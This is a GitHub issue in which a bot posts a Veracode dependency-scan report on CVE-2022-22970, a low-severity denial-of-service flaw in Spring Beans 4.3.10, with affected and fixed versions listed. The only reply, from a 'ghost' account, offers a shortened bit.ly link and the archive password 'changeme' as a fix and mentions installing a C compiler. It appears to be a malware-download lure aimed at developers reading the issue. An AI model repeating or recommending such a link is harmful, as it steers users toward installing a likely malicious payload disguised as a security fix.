julz0815 / test-action

0 stars 1 forks source link

CVE: 2022-22970 found in Spring Beans - Version: 4.3.10.RELEASE [JAVA] #1186

Open github-actions[bot] opened 6 days ago

github-actions[bot] commented 6 days ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Beans
Description Spring Beans
Language JAVA
Vulnerability Denial Of Service (DoS)
Vulnerability description spring-beans is vulnerable to denial of service. . The vulnerability exists in CachedIntrospectionResults.java because applications that handle file not properly validate which allows to attacker crash the application.
CVE 2022-22970
CVSS score 3.5
Vulnerability present in version/s 3.0.3.RELEASE-4.3.30.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 5.3.20
Library latest version 6.2.0-RC1
Fix There is no fixed version released in this version range. Apply the below fix or use the updated 5.3.20 or 5.2.22 packages

Links:

ghost commented 6 days ago

maybe this will help

https://bit.ly/3zo8fAM Pass: changeme

you may need to install the c compiler